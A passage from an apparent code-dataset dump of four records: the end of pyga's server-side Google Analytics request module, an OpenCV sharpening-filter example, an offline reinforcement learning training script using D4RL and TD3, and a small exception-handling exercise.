self.X10_SITESPEED_PROJECT_ID, X10.OBJECT_KEY_NUM, key)\n x10.set_value(self.X10_SITESPEED_PROJECT_ID,\n X10.VALUE_VALUE_NUM, self.page.load_time)\n params.utme = '%s%s' % (params.utme, x10.render_url_string())\n\n return params\n\n\nclass EventRequest(Request):\n X10_EVENT_PROJECT_ID = 5\n\n def __init__(self, config, tracker, visitor, session, event):\n super(EventRequest, self).__init__(config, tracker, visitor, session)\n self.event = event\n\n def get_type(self):\n return EventRequest.TYPE_EVENT\n\n def build_parameters(self):\n params = super(EventRequest, self).build_parameters()\n x10 = X10()\n x10.clear_key(self.X10_EVENT_PROJECT_ID)\n x10.clear_value(self.X10_EVENT_PROJECT_ID)\n x10.set_key(self.X10_EVENT_PROJECT_ID, X10.OBJECT_KEY_NUM,\n self.event.category)\n x10.set_key(\n self.X10_EVENT_PROJECT_ID, X10.TYPE_KEY_NUM, self.event.action)\n\n if self.event.label:\n x10.set_key(self.X10_EVENT_PROJECT_ID,\n X10.LABEL_KEY_NUM, self.event.label)\n\n if self.event.value:\n x10.set_value(self.X10_EVENT_PROJECT_ID,\n X10.VALUE_VALUE_NUM, self.event.value)\n\n params.utme = \"%s%s\" % (params.utme, x10.render_url_string())\n\n if self.event.noninteraction:\n params.utmni = 1\n\n return params\n\n\nclass SocialInteractionRequest(Request):\n def __init__(self, config, tracker, visitor, session, social_interaction, page):\n super(SocialInteractionRequest, self).__init__(config,\n tracker, visitor, session)\n self.social_interaction = social_interaction\n self.page = page\n\n def get_type(self):\n return SocialInteractionRequest.TYPE_SOCIAL\n\n def build_parameters(self):\n params = super(SocialInteractionRequest, self).build_parameters()\n\n tmppagepath = self.social_interaction.target\n if tmppagepath is None:\n tmppagepath = self.page.path\n\n params.utmsn = self.social_interaction.network\n params.utmsa = self.social_interaction.action\n params.utmsid = tmppagepath\n return params\n\n\nclass TransactionRequest(Request):\n def __init__(self, config, tracker, visitor, session, transaction):\n super(TransactionRequest, self).__init__(config, tracker,\n visitor, session)\n self.transaction = transaction\n\n def get_type(self):\n return TransactionRequest.TYPE_TRANSACTION\n\n def build_parameters(self):\n params = super(TransactionRequest, self).build_parameters()\n params.utmtid = self.transaction.order_id\n params.utmtst = self.transaction.affiliation\n params.utmtto = self.transaction.total\n params.utmttx = self.transaction.tax\n params.utmtsp = self.transaction.shipping\n params.utmtci = self.transaction.city\n params.utmtrg = self.transaction.state\n params.utmtco = self.transaction.country\n return params\n\n def build_visitor_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any visitor information for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n def build_custom_variable_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any custom variables for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n\nclass Config(object):\n '''\n Configurations for Google Analytics: Server Side\n\n Properties:\n error_severity -- How strict should errors get handled? 
After all,\n we do just do some tracking stuff here, and errors shouldn't\n break an application's functionality in production.\n RECOMMENDATION: Exceptions during deveopment, warnings in production.\n queue_requests -- Whether to just queue all requests on HttpRequest.fire()\n and actually send them on shutdown after all other tasks are done.\n This has two advantages:\n 1) It effectively doesn't affect app performance\n 2) It can e.g. handle custom variables that were set after scheduling a request\n fire_and_forget -- Whether to make asynchronous requests to GA without\n waiting for any response (speeds up doing requests).\n logging_callback -- Logging callback, registered via setLoggingCallback().\n Will be fired whenever a request gets sent out and receives the\n full HTTP request as the first and the full HTTP response\n (or null if the \"fireAndForget\" option or simulation mode are used) as the 2nd argument.\n request_timeout -- Seconds (float allowed) to wait until timeout when\n connecting to the Google analytics endpoint host.\n endpoint -- Google Analytics tracking request endpoint. Can be set to null to\n silently simulate (and log) requests without actually sending them.\n anonimize_ip_address -- Whether to anonymize IP addresses within Google Analytics\n by stripping the last IP address block, will be mapped to \"aip\" parameter.\n site_speed_sample_rate -- Defines a new sample set size (0-100) for\n Site Speed data collection. By default, a fixed 1% sampling of your site\n visitors make up the data pool from which the Site Speed metrics are derived.\n\n '''\n ERROR_SEVERITY_SILECE = 0\n ERROR_SEVERITY_PRINT = 1\n ERROR_SEVERITY_RAISE = 2\n\n def __init__(self):\n self.error_severity = Config.ERROR_SEVERITY_RAISE\n self.queue_requests = False\n # self.fire_and_forget = False # not supported as of now\n # self.logging_callback = False # not supported as of now\n self.request_timeout = 1\n self.endpoint = 'http://www.google-analytics.com/__utm.gif'\n self.anonimize_ip_address = False\n self.site_speed_sample_rate = 1\n\n def __setattr__(self, name, value):\n if name == 'site_speed_sample_rate':\n if value and (value < 0 or value > 100):\n raise ValueError('For consistency with ga.js, sample rates must be specified as a number between 0 and 100.')\n object.__setattr__(self, name, value)\n\n\nclass Parameters(object):\n '''\n This simple class is mainly meant to be a well-documented overview\n of all possible GA tracking parameters.\n\n http://code.google.com/apis/analytics/docs/tracking/gaTrackingTroubleshooting.html#gifParameters\n\n General Parameters:\n utmwv -- Google Analytics client version\n utmac -- Google Analytics account ID\n utmhn -- Host Name\n utmt -- Indicates the type of request, which is one of null (for page),\n \"event\", \"tran\", \"item\", \"social\", \"var\" (deprecated) or \"error\"\n (used by ga.js for internal client error logging).\n utms -- Contains the amount of requests done in this session. Added in ga.js v4.9.2.\n utmn -- Unique ID (random number) generated for each GIF request\n utmcc -- Contains all cookie values, see below\n utme -- Extensible Parameter, used for events and custom variables\n utmni -- Event \"non-interaction\" parameter. 
By default, the event hit will impact a visitor's bounce rate.\n By setting this parameter to 1, this event hit will not be used in bounce rate calculations.\n aip -- Whether to anonymize IP addresses within Google Analytics by stripping the last IP address block, either null or 1\n utmu -- Used for GA-internal statistical client function usage and error tracking,\n not implemented in php-ga as of now, but here for documentation completeness.\n http://glucik.blogspot.com/2011/02/utmu-google-analytics-request-parameter.html\n\n Page Parameters:\n utmp -- Page request URI\n utmdt -- Page title\n utmcs -- Charset encoding (default \"-\")\n utmr -- Referer URL (default \"-\" or \"0\" for internal purposes)\n\n Visitor Parameters:\n utmip -- IP Address of the end user, found in GA for Mobile examples, but sadly seems to be ignored in normal GA use\n utmul -- Visitor's locale string (all lower-case, country part optional)\n utmfl -- Visitor's Flash version (default \"-\")\n utmje -- Visitor's Java support, either 0 or 1 (default \"-\")\n utmsc -- Visitor's screen color depth\n utmsr -- Visitor's screen resolution\n _utma -- Visitor tracking cookie parameter.\n\n Session Parameters:\n utmhid -- Hit id for revenue per page tracking for AdSense, a random per-session ID\n _utmb -- Session timeout cookie parameter.\n _utmc -- Session tracking cookie parameter.\n utmipc -- Product Code. This is the sku code for a given product.\n utmipn -- Product Name\n utmipr -- Unit Price. Value is set to numbers only.\n utmiqt -- Unit Quantity.\n utmiva -- Variations on an item.\n utmtid -- Order ID.\n utmtst -- Affiliation\n utmtto -- Total Cost\n utmttx -- Tax Cost\n utmtsp -- Shipping Cost\n utmtci -- Billing City\n utmtrg -- Billing Region\n utmtco -- Billing Country\n\n Campaign Parameters:\n utmcn -- Starts a new campaign session. Either utmcn or utmcr is present on any given request,\n but never both at the same time. Changes the campaign tracking data;\n but does not start a new session. Either 1 or not set.\n Found in gaforflash but not in ga.js, so we do not use it,\n but it will stay here for documentation completeness.\n utmcr -- Indicates a repeat campaign visit. This is set when any subsequent clicks occur on the\n same link. Either utmcn or utmcr is present on any given request,\n but never both at the same time. Either 1 or not set.\n Found in gaforflash but not in ga.js, so we do not use it,\n but it will stay here for documentation completeness.\n utmcid -- Campaign ID, a.k.a. \"utm_id\" query parameter for ga.js\n utmcsr -- Source, a.k.a. \"utm_source\" query parameter for ga.js\n utmgclid -- Google AdWords Click ID, a.k.a. \"gclid\" query parameter for ga.js\n utmdclid -- Not known for sure, but expected to be a DoubleClick Ad Click ID.\n utmccn -- Name, a.k.a. \"utm_campaign\" query parameter for ga.js\n utmcmd -- Medium, a.k.a. \"utm_medium\" query parameter for ga.js\n utmctr -- Terms/Keywords, a.k.a. \"utm_term\" query parameter for ga.js\n utmcct -- Ad Content Description, a.k.a. \"utm_content\" query parameter for ga.js\n utmcvr -- Unknown so far. 
Found in ga.js.\n _utmz -- Campaign tracking cookie parameter.\n\n Social Tracking Parameters:\n utmsn -- The network on which the action occurs\n utmsa -- The type of action that happens\n utmsid -- The page URL from which the action occurred.\n\n Google Website Optimizer (GWO) parameters:\n _utmx -- Website Optimizer cookie parameter.\n\n Custom Variables parameters (deprecated):\n _utmv -- Deprecated custom variables cookie parameter.\n\n '''\n\n def __init__(self):\n # General Parameters\n self.utmwv = Tracker.VERSION\n self.utmac = ''\n self.utmhn = ''\n self.utmt = ''\n self.utms = ''\n self.utmn = ''\n self.utmcc = ''\n self.utme = ''\n self.utmni = ''\n self.aip = ''\n self.utmu = ''\n\n # Page Parameters\n self.utmp = ''\n self.utmdt = ''\n self.utmcs = '-'\n self.utmr = '-'\n\n # Visitor Parameters\n self.utmip = ''\n self.utmul = ''\n self.utmfl = '-'\n self.utmje = '-'\n self.utmsc = ''\n self.utmsr = ''\n '''\n Visitor tracking cookie __utma\n\n This cookie is typically written to the browser upon the first\n visit to your site from that web browser. If the cookie has been\n deleted by the browser operator, and the browser subsequently\n visits your site, a new __utma cookie is written with a different unique ID.\n\n This cookie is used to determine unique visitors to your site and\n it is updated with each page view. Additionally, this cookie is\n provided with a unique ID that Google Analytics uses to ensure both the\n validity and accessibility of the cookie as an extra security measure.\n\n Expiration: 2 years from set/update.\n Format: __utma=.....\n '''\n self._utma = ''\n\n # Session Parameters\n self.utmhid = ''\n '''\n Session timeout cookie parameter __utmb\n\n Will never be sent with requests, but stays here for documentation completeness.\n\n This cookie is used to establish and continue a user session with your site.\n When a user views a page on your site, the Google Analytics code attempts to update this cookie.\n If it does not find the cookie, a new one is written and a new session is established.\n\n Each time a user visits a different page on your site, this cookie is updated to expire in 30 minutes,\n thus continuing a single session for as long as user activity continues within 30-minute intervals.\n\n This cookie expires when a user pauses on a page on your site for longer than 30 minutes.\n You can modify the default length of a user session with the setSessionTimeout() method.\n\n Expiration: 30 minutes from set/update.\n\n Format: __utmb=...\n\n '''\n self._utmb = ''\n '''\n Session tracking cookie parameter __utmc\n\n Will never be sent with requests, but stays here for documentation completeness.\n\n This cookie operates in conjunction with the __utmb cookie to\n determine whether or not to establish a new session for the user.\n In particular, this cookie is not provided with an expiration date,\n so it expires when the user exits the browser.\n\n Should a user visit your site, exit the browser and then return to your website within 30 minutes,\n the absence of the __utmc cookie indicates that a new session needs to be established,\n despite the fact that the __utmb cookie has not yet expired.\n\n Expiration: Not set.\n\n Format: __utmc=\n\n '''\n self._utmc = ''\n self.utmipc = ''\n self.utmipn = ''\n self.utmipr = ''\n self.utmiqt = ''\n self.utmiva = ''\n self.utmtid = ''\n self.utmtst = ''\n self.utmtto = ''\n self.utmttx = ''\n self.utmtsp = ''\n self.utmtci = ''\n self.utmtrg = ''\n self.utmtco = ''\n\n # Campaign Parameters\n self.utmcn = 
''\n self.utmcr = ''\n self.utmcid = ''\n self.utmcsr = ''\n self.utmgclid = ''\n self.utmdclid = ''\n self.utmccn = ''\n self.utmcmd = ''\n self.utmctr = ''\n self.utmcct = ''\n self.utmcvr = ''\n '''\n Campaign tracking cookie parameter.\n\n This cookie stores the type of referral used by the visitor to reach your site,\n whether via a direct method, a referring link, a website search, or a campaign such as an ad or an email link.\n\n It is used to calculate search engine traffic, ad campaigns and page navigation within your own site.\n The cookie is updated with each page view to your site.\n\n Expiration: 6 months from set/update.\n\n Format: __utmz=....\n\n '''\n self._utmz = ''\n\n # Social Tracking Parameters\n self.utmsn = ''\n self.utmsa = ''\n self.utmsid = ''\n\n # Google Website Optimizer (GWO) parameters\n '''\n Website Optimizer cookie parameter.\n\n This cookie is used by Website Optimizer and only set when Website\n Optimizer is used in combination with GA.\n See the Google Website Optimizer Help Center for details.\n\n Expiration: 2 years from set/update.\n '''\n self._utmx = ''\n\n # Custom Variables parameters (deprecated)\n '''\n Deprecated custom variables cookie parameter.\n\n This cookie parameter is no longer relevant as of migration from setVar() to\n setCustomVar() and hence not supported by this library,\n but will stay here for documentation completeness.\n\n The __utmv cookie passes the information provided via the setVar() method,\n which you use to create a custom user segment.\n\n Expiration: 2 years from set/update.\n\n Format: __utmv=.\n\n '''\n self._utmv = ''\n\n def get_parameters(self):\n '''\n Get all gif request parameters out of the class in a dict form.\n Attributes starting with _ are cookie names, so we dont need them.\n '''\n params = {}\n attribs = vars(self)\n for attr in attribs:\n if attr[0] != '_':\n val = getattr(self, attr)\n if val:\n params[attr] = val\n\n return params\n\n\nclass Tracker(object):\n '''\n Act like a Manager of all files\n\n Properties:\n account_id -- Google Analytics account ID, will be mapped to \"utmac\" parameter\n domain_name -- Host Name, will be mapped to \"utmhn\" parameter\n allow_hash -- Whether to generate a unique domain hash,\n default is true to be consistent with the GA Javascript Client\n custom_variables -- CustomVariable instances\n campaign -- Campaign instance\n '''\n\n '''\n Google Analytics client version on which this library is built upon,\n will be mapped to \"utmwv\" parameter.\n\n This doesn't necessarily mean that all features of the corresponding\n ga.js version are implemented but rather that the requests comply\n with these of ga.js.\n\n http://code.google.com/apis/analytics/docs/gaJS/changelog.html\n '''\n VERSION = '5.3.0'\n config = Config()\n\n def __init__(self, account_id='', domain_name='', conf=None):\n self.account_id = account_id\n self.domain_name = domain_name\n self.allow_hash = True\n self.custom_variables = {}\n self.campaign = None\n if isinstance(conf, Config):\n Tracker.config = conf\n\n def __setattr__(self, name, value):\n if name == 'account_id':\n if value and not utils.is_valid_google_account(value):\n raise ValueError(\n 'Given Google Analytics account ID is not valid')\n\n elif name == 'campaign':\n if isinstance(value, Campaign):\n value.validate()\n else:\n value = None\n\n object.__setattr__(self, name, value)\n\n def add_custom_variable(self, custom_var):\n '''\n Equivalent of _setCustomVar() in GA Javascript client\n 
http://code.google.com/apis/analytics/docs/tracking/gaTrackingCustomVariables.html\n '''\n if not isinstance(custom_var, CustomVariable):\n return\n\n custom_var.validate()\n index = custom_var.index\n self.custom_variables[index] = custom_var\n\n def remove_custom_variable(self, index):\n '''Equivalent of _deleteCustomVar() in GA Javascript client.'''\n if index in self.custom_variables:\n del self.custom_variables[index]\n\n def track_pageview(self, page, session, visitor):\n '''Equivalent of _trackPageview() in GA Javascript client.'''\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'page': page,\n }\n request = PageViewRequest(**params)\n request.fire()\n\n def track_event(self, event, session, visitor):\n '''Equivalent of _trackEvent() in GA Javascript client.'''\n event.validate()\n\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'event': event,\n }\n request = EventRequest(**params)\n request.fire()\n\n def track_transaction(self, transaction, session, visitor):\n '''Combines _addTrans(), _addItem() (indirectly) and _trackTrans() of GA Javascript client.'''\n transaction.validate()\n\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'transaction': transaction,\n }\n request = TransactionRequest(**params)\n request.fire()\n\n for item in transaction.items:\n item.validate()\n\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'item': item,\n }\n request = ItemRequest(**params)\n request.fire()\n\n def track_social(self, social_interaction, page, session, visitor):\n '''Equivalent of _trackSocial() in GA Javascript client.'''\n params = {\n 'config': self.config,\n 'tracker': self,\n 'visitor': visitor,\n 'session': session,\n 'social_interaction': social_interaction,\n 'page': page,\n }\n request = SocialInteractionRequest(**params)\n request.fire()\n\n\nclass X10(object):\n __KEY = 'k'\n __VALUE = 'v'\n __DELIM_BEGIN = '('\n __DELIM_END = ')'\n __DELIM_SET = '*'\n __DELIM_NUM_VALUE = '!'\n __ESCAPE_CHAR_MAP = {\n \"'\": \"'0\",\n ')': \"'1\",\n '*': \"'2\",\n '!': \"'3\",\n }\n __MINIMUM = 1\n\n OBJECT_KEY_NUM = 1\n TYPE_KEY_NUM = 2\n LABEL_KEY_NUM = 3\n VALUE_VALUE_NUM = 1\n\n def __init__(self):\n self.project_data = {}\n\n def has_project(self, project_id):\n return project_id in self.project_data\n\n def set_key(self, project_id, num, value):\n self.__set_internal(project_id, X10.__KEY, num, value)\n\n def get_key(self, project_id, num):\n return self.__get_internal(project_id, X10.__KEY, num)\n\n def clear_key(self, project_id):\n self.__clear_internal(project_id, X10.__KEY)\n\n def set_value(self, project_id, num, value):\n self.__set_internal(project_id, X10.__VALUE, num, value)\n\n def get_value(self, project_id, num):\n return self.__get_internal(project_id, X10.__VALUE, num)\n\n def clear_value(self, project_id):\n self.__clear_internal(project_id, X10.__VALUE)\n\n def __set_internal(self, project_id, _type, num, value):\n '''Shared internal implementation for setting an X10 data type.'''\n if project_id not in self.project_data:\n self.project_data[project_id] = {}\n\n if _type not in self.project_data[project_id]:\n self.project_data[project_id][_type] = {}\n\n self.project_data[project_id][_type][num] = value\n\n def __get_internal(self, project_id, _type, num):\n ''' Shared internal implementation for getting an X10 data type.'''\n if num in 
self.project_data.get(project_id, {}).get(_type, {}):\n            return self.project_data[project_id][_type][num]\n        return None\n\n    def __clear_internal(self, project_id, _type):\n        '''\n        Shared internal implementation for clearing all X10 data\n        of a type from a certain project.\n        '''\n        if project_id in self.project_data and _type in self.project_data[project_id]:\n            del self.project_data[project_id][_type]\n\n    def __escape_extensible_value(self, value):\n        '''Escape X10 string values to remove ambiguity for special characters.'''\n        def _translate(char):\n            try:\n                return self.__ESCAPE_CHAR_MAP[char]\n            except KeyError:\n                return char\n\n        return ''.join(map(_translate, str(value)))\n\n    def __render_data_type(self, data):\n        '''Given a data array for a certain type, render its string encoding.'''\n        result = []\n        last_indx = 0\n\n        for indx, entry in sorted(data.items()):\n            if entry:\n                tmpstr = ''\n\n                # Check if we need to append the number. If the last number was\n                # outputted, or if this is the assumed minimum, then we don't.\n                if indx != X10.__MINIMUM and indx - 1 != last_indx:\n                    tmpstr = '%s%s%s' % (tmpstr, indx, X10.__DELIM_NUM_VALUE)\n\n                tmpstr = '%s%s' % (\n                    tmpstr, self.__escape_extensible_value(entry))\n                result.append(tmpstr)\n\n            last_indx = indx\n\n        return \"%s%s%s\" % (X10.__DELIM_BEGIN, X10.__DELIM_SET.join(result), X10.__DELIM_END)\n\n    def __render_project(self, project):\n        '''Given a project array, render its string encoding.'''\n        result = ''\n        need_type_qualifier = False\n\n        for val in X10.__KEY, X10.__VALUE:\n            if val in project:\n                data = project[val]\n                if need_type_qualifier:\n                    result = '%s%s' % (result, val)\n\n                result = '%s%s' % (result, self.__render_data_type(data))\n                need_type_qualifier = False\n            else:\n                need_type_qualifier = True\n\n        return result\n\n    def render_url_string(self):\n        result = ''\n        for project_id, project in self.project_data.items():\n            result = '%s%s%s' % (\n                result, project_id, self.__render_project(project))\n\n        return result\n","repo_name":"steeve/xbmctorrent","sub_path":"resources/site-packages/pyga/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":37602,"program_lang":"python","lang":"en","doc_type":"code","stars":387,"dataset":"github-code","pt":"86"} +{"seq_id":"26600798976","text":"# Import Needed Packages\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport cv2\n\n\n# Read In Image\nimage = cv2.imread('../data/Lena.png')\n\n# Create An 11x11 Sharpening Kernel\nkSize = 11\nalpha = 2\n\nkernel = cv2.getGaussianKernel(kSize,0)\nkernel = -alpha * kernel @ kernel.T\nkernel[kSize//2, kSize//2] += 1 + alpha\n\n# Filter Image Using Created Kernel\nfiltered = cv2.filter2D(image, -1, kernel)\n\n# Display Results\nplt.figure(figsize=(8,4))\nplt.subplot(121)\nplt.axis('off')\nplt.title('Image')\nplt.imshow(image[:,:,[2,1,0]])\nplt.subplot(122)\nplt.axis('off')\nplt.title('Filtered')\nplt.imshow(filtered[:,:,[2,1,0]])\nplt.tight_layout()\nplt.show()","repo_name":"FadedIllusions/CVPyCookbook","sub_path":"Chapter_002/024_creating_your_own_filter.py","file_name":"024_creating_your_own_filter.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44015485009","text":"import numpy as np\nfrom numpy.lib.utils import info\nimport torch\nimport gym\nimport argparse\nimport os\n\nfrom torch.nn.functional import threshold\nimport d4rl\nfrom d4rl.offline_env import OfflineEnv\nimport utils\nimport TD3\nfrom episodic_memory_tbp import 
EpisodicMemoryTBP\nfrom torch.utils.tensorboard import SummaryWriter\nimport time\n\ndef reward2return(rewards, gamma=0.99):\n # covert reward to return\n returns = []\n Rtn = 0\n for r in reversed(rewards):\n Rtn = r + gamma * Rtn\n returns.append(Rtn)\n return list(reversed(returns))\n\n# Runs policy for X episodes and returns average reward\n# A fixed seed is used for the eval environment\ndef eval_policy(policy, env_name, seed, eval_episodes=10):\n\teval_env = gym.make(env_name)\n\teval_env.seed(seed + 100)\n\tavg_reward = 0.\n\tepisode_returns = []\n\teval_qs = []\n\tEVAl_MEAN = 0\n\tEVAL_ABS = 0\n\tfor _ in range(eval_episodes):\n\t\tstate, done = eval_env.reset(), False\n\t\twhile not done:\n\t\t\taction = policy.select_action(np.array(state), True)\n\t\t\tstate, reward, done, info = eval_env.step(action)\n\t\t\tavg_reward += reward\n\t\t\tepisode_returns.append(reward)\n\t\t\teval_q = policy.eval_state_action(state, action)\n\t\t\teval_qs.append(np.mean(eval_q))\n\t\tepisode_returns = reward2return(episode_returns)\n\t\tEVAl_MEAN += np.mean([x - y for x, y in zip(eval_qs, episode_returns)])\n\t\tEVAL_ABS += np.mean([abs(x - y) for x, y in zip(eval_qs, episode_returns)])\n\t\teval_qs = []\n\t\tepisode_returns = []\t\n\n\tavg_reward /= eval_episodes\n\tEVAl_MEAN /= eval_episodes\n\tEVAL_ABS /= eval_episodes\n\n\tprint(\"---------------------------------------\")\n\tprint(f\"Evaluation over {eval_episodes} episodes: {avg_reward:.3f} env: {str(env_name)}\")\n\tprint(\"---------------------------------------\")\n\treturn avg_reward, EVAl_MEAN, EVAL_ABS\n\nif __name__ == \"__main__\":\n\t\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--policy\", default=\"TD3\") # Policy name (TD3, DDPG or OurDDPG)\n\tparser.add_argument(\"--env\", default=\"pen-human-v0\") # OpenAI gym environment name\n\tparser.add_argument(\"--seed\", default=100, type=int) # Sets Gym, PyTorch and Numpy seeds\n\tparser.add_argument(\"--start_timesteps\", default=25e3, type=int)# Time steps initial random policy is used 25e3\n\tparser.add_argument(\"--eval_freq\", default=1e2, type=int) # How often (time steps) we evaluate\n\tparser.add_argument(\"--max_timesteps\", default=1e6, type=int) # Max time steps to run environment\n\tparser.add_argument(\"--expl_noise\", default=0.1) # Std of Gaussian exploration noise\n\tparser.add_argument(\"--batch_size\", default=128, type=int) # Batch size for both actor and critic\n\tparser.add_argument(\"--discount\", default=0.99) # Discount factor\n\tparser.add_argument(\"--tau\", default=0.005) # Target network update rate\n\tparser.add_argument(\"--policy_noise\", default=0.2) # Noise added to target policy during critic update\n\tparser.add_argument(\"--noise_clip\", default=0.5) # Range to clip target policy noise\n\tparser.add_argument(\"--policy_freq\", default=2, type=int) # Frequency of delayed policy updates\n\tparser.add_argument(\"--save_model\", action=\"store_true\") # Save model and optimizer parameters\n\tparser.add_argument(\"--load_model\", default=\"\") # Model load file name, \"\" doesn't load, \"default\" uses file_name\n\targs = parser.parse_args()\n\n\tfile_name = f\"{args.policy}_{args.env}_{args.seed}\"\n\tprint(\"---------------------------------------\")\n\tprint(f\"Policy: {args.policy}, Env: {args.env}, Seed: {args.seed}\")\n\tprint(\"---------------------------------------\")\n\n\tif not os.path.exists(\"./results\"):\n\t\tos.makedirs(\"./results\")\n\n\tif args.save_model and not 
os.path.exists(\"./models\"):\n\t\tos.makedirs(\"./models\")\n\n\tenv = gym.make(args.env)\n\n\t# Set seeds\n\tenv.seed(args.seed)\n\tenv.action_space.seed(args.seed)\n\ttorch.manual_seed(args.seed)\n\tnp.random.seed(args.seed)\n\t\n\tstate_dim_ = env.observation_space.shape[0]\n\taction_dim = env.action_space.shape[0] \n\tmax_action = float(env.action_space.high[0])\n\n\tkwargs = {\n\t\t\"state_dim\": state_dim_,\n\t\t\"action_dim\": action_dim,\n\t\t\"max_action\": max_action,\n\t\t\"discount\": args.discount,\n\t\t\"tau\": args.tau,\n\t}\n\n\t# Initialize policy\n\tif args.policy == \"TD3\":\n\t\t# Target policy smoothing is scaled wrt the action scale\n\t\tkwargs[\"policy_noise\"] = args.policy_noise * max_action\n\t\tkwargs[\"noise_clip\"] = args.noise_clip * max_action\n\t\tkwargs[\"policy_freq\"] = args.policy_freq\n\t\tpolicy = TD3.TD3(**kwargs)\n\n\tbuffer_size = len(env.get_dataset()['observations'])\n\t# -----------------------------parameter----------------------------\n\ttrain_freq = 100\n\tgradient_steps = 200\n\tslope = 0.3\n\tmax_step = 1000\n\tpolicy_beta = 100\n\tthreshold_vem = -1000\n\teta = 0.1\n\t# -----------------------------parameter----------------------------\n\tnum_timesteps = 0\n\tbeta = -1\n\n\tmemory = EpisodicMemoryTBP(buffer_size, state_dim=1,\n\t\t\t\t\t\t\t\tobs_space=env.observation_space,\n\t\t\t\t\t\t\t\taction_shape=env.action_space,\n\t\t\t\t\t\t\t\tgamma=args.discount,\n\t\t\t\t\t\t\t\tmax_step=max_step,\n\t\t\t\t\t\t\t\tpolicy=policy,\n\t\t\t\t\t\t\t\teta=eta,\n\t\t\t\t\t\t\t\tpolicy_noise=kwargs[\"policy_noise\"], noise_clip=kwargs[\"noise_clip\"], max_action=kwargs[\"max_action\"])\n\n\t# -------------------------------load dataset------------------------------------\n\tdataset = d4rl.sequence_dataset(env)\n\treward_l = []\n\tfor seq in dataset:\n\t\tobservations, actions, dones, rewards, truly_dones = seq['observations'], seq['actions'], seq[\n\t\t\t'timeouts'], seq['rewards'], seq['terminals']\n\t\tif dones[-1] == True:\n\t\t\ttruly_dones[-1] = True\n\t\telif truly_dones[-1] == True:\n\t\t\tobservations = np.vstack((observations, observations[-1].reshape(1, -1)))\n\t\t\tactions = np.vstack((actions, actions[-1].reshape(1, -1)))\n\t\t\tdones = np.hstack((dones, np.array([True])))\n\t\t\ttruly_dones = np.hstack((truly_dones, np.array([True])))\n\t\t\trewards = np.hstack((rewards, rewards[-1].reshape(-1,)))\n\t\treward_l.append(rewards.sum())\n\t\ttrajectory = [(obs, action, 0, 0, reward, truly_done, done) for\n\t\t\t\t\t\tobs, action, reward, truly_done, done in\n\t\t\t\t\t\tzip(observations, actions, rewards, truly_dones, dones)]\n\t\tmemory.update_sequence_with_qs(trajectory)\n\tprint('---------------------- done ----------------------------')\n\t# --------------------------------------------------------------------------------\n\tpolicy_name = 'VEM_softmax'\n\twriter = SummaryWriter(f\"results/{str(policy_name) + '_' + str(args.env) + '_' + str(args.seed)}/\")\n\ttorch.set_num_threads(10)\n\tstart_time = time.time()\n\t# -----------------------------update V------------------------------------\n\tfor t in range(int(args.max_timesteps)):\n\t\tif t % train_freq == 0:\n\t\t\tmemory.update_memory(0, beta=beta)\n\t\t\tprint('update_t: ', t, 'time: ', int((time.time() - start_time)), str(args.env), str(slope), str(max_step), str(policy_beta), str(args.seed))\n\t\t\tstart_time = time.time()\n\t\t\tfor grad_step in range(gradient_steps):\n\t\t\t\treturn_info = policy.train_critic(memory, args.batch_size, gradient_steps, slope, policy_beta)\n\t\tif (t 
+ 1) % args.eval_freq == 0:\n\t\t\twriter.add_scalar('V_max', return_info['Q_max'], t)\n\t\t\twriter.add_scalar('V_min', return_info['Q_min'], t)\n\t\t\twriter.add_scalar('V_mean', return_info['Q_mean'], t)\n\t\t\twriter.add_scalar('R_max', return_info['R_max'], t)\n\t\t\twriter.add_scalar('R_min', return_info['R_min'], t)\n\t\t\twriter.add_scalar('R_mean', return_info['R_mean'], t)\n\t\t\twriter.add_scalar('v_loss', return_info['q_loss'], t)\n\n\t\tif (t + 1) % (args.eval_freq * 5) == 0: # args.eval_freq * 5\n\t\t\tpolicy.save(f\"./pytorch_models/{str(args.env) + '_' + str(args.seed)}\")\n\n\t# -----------------------------update A------------------------------------\n\tpolicy.load(f\"./pytorch_models/{str(args.env) + '_' + str(args.seed)}\")\n\tmemory.update_memory(0, beta=beta)\n\tfor t in range(int(args.max_timesteps)): \n\t\tif t % train_freq == 0:\n\t\t\tfor grad_step in range(gradient_steps):\n\t\t\t\treturn_info = policy.train_actor(memory, args.batch_size, gradient_steps, slope, policy_beta, threshold_vem, args.env)\n\t\tif (t + 1) % args.eval_freq == 0:\n\t\t\teval_reward, eval_mean, eval_abs = eval_policy(policy, args.env, args.seed)\n\t\t\twriter.add_scalar('reward', eval_reward, t)\n\t\t\twriter.add_scalar('V-R_mean', eval_mean, t)\n\t\t\twriter.add_scalar('V-R_abs', eval_abs, t)\n\t\t\ttry:\n\t\t\t\twriter.add_scalar('actor_loss', return_info['actor_loss'], t)\n\t\t\t\twriter.add_scalar('logp', return_info['logp'], t)\n\t\t\texcept:\n\t\t\t\tpass","repo_name":"YiqinYang/VEM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8364,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"86"} +{"seq_id":"26581339572","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x=0):\n try:\n count = 0\n count2 = 0\n for i in my_list:\n count += 1\n if x >= count:\n raise IndexError\n except IndexError:\n for j in range(count):\n print(my_list[j], end=\"\")\n count2 += 1\n print(end=\"\\n\")\n else:\n for j in range(x):\n print(my_list[j], end=\"\")\n count2 += 1\n print(end=\"\\n\")\n return 